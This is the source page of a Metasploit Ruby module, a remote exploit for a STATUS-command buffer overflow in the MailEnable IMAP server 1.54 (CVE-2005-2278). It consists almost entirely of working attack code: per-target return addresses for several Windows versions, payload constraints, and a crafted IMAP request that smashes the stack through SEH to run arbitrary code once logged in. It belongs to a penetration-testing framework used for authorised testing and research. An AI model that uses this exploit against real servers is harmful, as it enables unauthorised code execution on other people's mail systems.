Path: blob/master/modules/exploits/windows/imap/mailenable_status.rb
19934 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Imap9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'MailEnable IMAPD (1.54) STATUS Request Buffer Overflow',16'Description' => %q{17MailEnable's IMAP server contains a buffer overflow18vulnerability in the STATUS command. With proper19credentials, this could allow for the execution of arbitrary20code.21},22'Author' => [ 'MC' ],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2005-2278'],26[ 'OSVDB', '17844'],27[ 'BID', '14243'],28[ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=19193'],29],30'Privileged' => true,31'DefaultOptions' => {32'EXITFUNC' => 'thread',33},34'Payload' => {35'Space' => 450,36'BadChars' => "\x00\x0a\x0d\x20",37'StackAdjustment' => -3500,38},39'Platform' => 'win',40'Targets' => [41['MailEnable 1.54 Pro Universal', { 'Rets' => [9273, 0x1001c019] }], # MEAISP.DLL42['Windows XP Pro SP0/SP1 English', { 'Rets' => [9273, 0x71aa32ad] }],43['Windows 2000 Pro English ALL', { 'Rets' => [9273, 0x75022ac4] }],44['Windows 2003 Server English', { 'Rets' => [9273, 0x7ffc0638] }],45],46'DisclosureDate' => '2005-07-13',47'DefaultTarget' => 0,48'Notes' => {49'Reliability' => UNKNOWN_RELIABILITY,50'Stability' => UNKNOWN_STABILITY,51'SideEffects' => UNKNOWN_SIDE_EFFECTS52}53)54)55end5657def exploit58connect_login5960seh = generate_seh_payload(target['Rets'][1])61buf = rand_text_alphanumeric(target['Rets'][0])62req = "a001 STATUS \".\x00" + buf + seh63req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"64sock.put(req)6566handler67disconnect68end69end707172